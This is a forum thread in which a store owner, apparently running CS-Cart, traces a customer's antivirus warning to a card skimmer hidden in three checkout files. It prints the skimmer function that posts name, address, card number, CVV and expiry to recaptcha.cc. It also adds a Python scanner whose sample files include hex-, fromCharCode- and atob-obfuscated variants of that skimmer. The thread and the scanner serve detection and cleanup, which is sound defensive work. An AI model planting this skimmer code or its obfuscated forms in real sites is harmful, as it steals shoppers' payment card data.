Recaptcha.cc and Norton warning

I have a customer stating his Norton is telling him my site has been infected when trying to check out and kicks him off my site. I tried to replicate the issue but I get no warnings and he is the only one that has mentioned it. The warning isn’t even on my domain but happens during checkout. So I’m wondering if his computer is infected or this is a legit problem with my site. The warning is coming from https://recaptcha.cc/“mydomain”.php. “mydomain” is actually my domain name without the .com attached to it. Anyone heard of anything like this? I couldn’t find any information on recaptcha.cc and the website itself gets a warning of a trojan. Just wondering if his warnings could have anything to do with my website.

This is a third-party domain that is not associated with Google reCAPTCHA in any way. Can you find the links to this domain in the HTML code of your store’s pages? If not, I assume there is something malicious installed on your customer’s PC.

I’m pretty sure the customer’s computer is infected and it’s trying to trick him into thinking it is our site because the .php part matches our domain. The recaptcha.cc site is a trojan site when you go to it, so I can see why the warning would be happening. Just not sure how it is being triggered during checkout from our site, so trying to get more information from them. No source code on our checkout page has any links to the .cc site.

Customer states: “The Norton warning and disconnect occurs when I am at the end of checking out, when I try to enter the name on the credit card. I clicked “continue to the site” a couple times (despite warning not to do so by Norton) and was able to complete the check out and have received an order confirmation email.”

This was paid using normal credit card on site (cc.tpl). Just to make sure, is there some file I should be looking at to make sure the link to this malicious site isn’t in there?

You can use grep in your installation to check if this text is present in any files in your installation. You can also search your store’s database for any matches.

With the help of grep and my host we did find some files with this information in it:

shop/design/themes/responsive/templates/index.tpl
shop/js/lib/select2/dist/js/select2.full.min.js
shop/js/tygh/checkout/pickup_search.js

In all three cases, it occurs within a function as a variable which contains the URL recaptcha.cc:

function rasdafgss()
{
    // Build a POST body from the checkout form values the skimmer has
    // collected: name, billing address, card number, CVV and expiry date.
    params = 'fname='+fname+'&street_address='+street_address+'&City='+City+'&State='+State+'&Country='+Country+'&PostCode='+PostCode+'&CCNo='+CCNo+'&CVV='+CVV+'&ExpDateMonth='+ExpDateMonth+'&ExpDateYear='+ExpDateYear;
    // Exfiltration endpoint: the attacker-controlled domain, with a
    // filename that matches the victim store's own domain name.
    var url = 'https://recaptcha.cc/mysite.php';
    // Send the captured card data to the attacker as a plain form POST.
    var http = new XMLHttpRequest();
    http.open('POST', url, true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.send(params);
}

“Unfortunately, I can’t say how it got there. The timestamps on all three files are old (from 2020 and 2021), but these cannot necessarily be relied upon, as some malware will edit these to thwart/confuse removal efforts.”

So can I just remove this malicious code from those 3 files and be good to go? Or any other advice?
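A plain grep for the domain string (as suggested earlier in the thread) finds the skimmer shown above, but it misses the same skimmer once the domain is assembled at runtime from hex escapes, String.fromCharCode or atob(). The scanner below is an added example for this thread, not CS-Cart code and not the tooling anyone in the thread used; it undoes those three common obfuscations before matching, flags the known domain, and separately flags any script that sends card-field names (CCNo, CVV, ExpDateMonth, ExpDateYear) to a host other than the store's own. The file paths are the ones listed in the thread, but their contents, the obfuscated variants, the "clean" checkout file and the OWN_HOSTS value (mydomain.com) are constructed for the example.

```python
"""Scan store files (or database rows) for the card-skimmer indicators
discussed above. Added example; sample contents are constructed inline."""
import base64
import re
from typing import Dict, List, Set

# Indicators taken from the thread: the exfiltration domain and the form
# field names the skimmer harvests.
SKIMMER_DOMAIN = "recaptcha.cc"
CARD_FIELDS = ("CCNo", "CVV", "ExpDateMonth", "ExpDateYear")
# Assumption for the example: the store's own host(s); adjust to your site.
OWN_HOSTS = {"mydomain.com", "www.mydomain.com"}


def decode_obfuscated(text: str) -> str:
    """Undo common JS string obfuscation so that matching also catches a
    skimmer whose domain never appears literally in the file."""
    # '\x72\x65...' hex escapes -> characters
    out = re.sub(r"\\x([0-9a-fA-F]{2})",
                 lambda m: chr(int(m.group(1), 16)), text)
    # String.fromCharCode(114,101,...) -> "re..."
    out = re.sub(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)",
                 lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")
                                   if n.strip()), out)
    # atob("base64") -> decoded literal (left untouched if not valid base64)
    def _atob(m: "re.Match") -> str:
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except Exception:
            return m.group(0)
    out = re.sub(r"""atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""", _atob, out)
    return out


def scan_source(text: str, own_hosts: Set[str]) -> List[str]:
    """Return the list of findings for one file or DB row (empty if clean)."""
    decoded = decode_obfuscated(text)
    findings: List[str] = []
    if SKIMMER_DOMAIN in decoded:
        findings.append("known-domain")
    # Hosts that appear in literal URLs; anything not ours is suspicious
    # when combined with card fields and a sending primitive.
    hosts = set(re.findall(r"https?://([A-Za-z0-9.-]+)", decoded))
    external = {h for h in hosts if h not in own_hosts}
    sends = re.search(r"XMLHttpRequest|fetch\(|sendBeacon\(", decoded)
    fields = [f for f in CARD_FIELDS if f in decoded]
    if sends and len(fields) >= 2 and (external or findings):
        findings.append("card-field-exfil")
    return findings


def scan_files(files: Dict[str, str], own_hosts: Set[str]) -> Dict[str, List[str]]:
    """Map path -> findings, keeping only entries that have findings."""
    results = {path: scan_source(text, own_hosts) for path, text in files.items()}
    return {path: f for path, f in results.items() if f}


# Constructed sample contents (paths are the three the thread names plus a
# legitimate checkout script that must not be flagged).
SAMPLE_FILES = {
    "shop/js/tygh/checkout/pickup_search.js": r"""
function rasdafgss() {
  params = 'fname=' + fname + '&CCNo=' + CCNo + '&CVV=' + CVV + '&ExpDateMonth=' + ExpDateMonth;
  var url = 'https://recaptcha.cc/mysite.php';
  var http = new XMLHttpRequest();
  http.open('POST', url, true);
  http.send(params);
}""",
    "shop/design/themes/responsive/templates/index.tpl": r"""
var u = 'https://' + '\x72\x65\x63\x61\x70\x74\x63\x68\x61\x2e\x63\x63' + '/mysite.php';
var x = new XMLHttpRequest(); x.open('POST', u, true);
x.send('CCNo=' + CCNo + '&CVV=' + CVV);""",
    "shop/js/lib/select2/dist/js/select2.full.min.js": r"""
var h = String.fromCharCode(114,101,99,97,112,116,99,104,97,46,99,99);
fetch('https://' + atob("cmVjYXB0Y2hhLmNj") + '/mysite.php', {method: 'POST', body: 'CCNo=' + CCNo + '&CVV=' + CVV});""",
    "shop/js/tygh/checkout/checkout_legit.js": r"""
var http = new XMLHttpRequest();
http.open('POST', 'https://mydomain.com/checkout.php', true);
http.send('CCNo=' + CCNo + '&CVV=' + CVV + '&ExpDateYear=' + ExpDateYear);""",
}

if __name__ == "__main__":
    for path, findings in scan_files(SAMPLE_FILES, OWN_HOSTS).items():
        print(f"{path}: {', '.join(findings)}")
```

To use it on a real installation, read each file under the web root into the dict (and, as the thread advises, the text columns of the database, since template and block content can live there too) and feed it to scan_files. Because the "card-field-exfil" rule keys on behaviour rather than on the one domain string, it also catches a reinfection that switches to a different exfiltration host; the price is the occasional false positive, which is why the legitimate-host allowlist exists.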

Yes, of course, remove that code. There are no such lines of code in the standard CS-Cart files. In fact, I can recommend that you completely replace these files with the original ones. Just get them from the CS-Cart distribution of the same version you are using.

Yes, I removed the code shortly after it was found. There was another block of code after that which was also not normal so it was removed too. All has been working fine since.
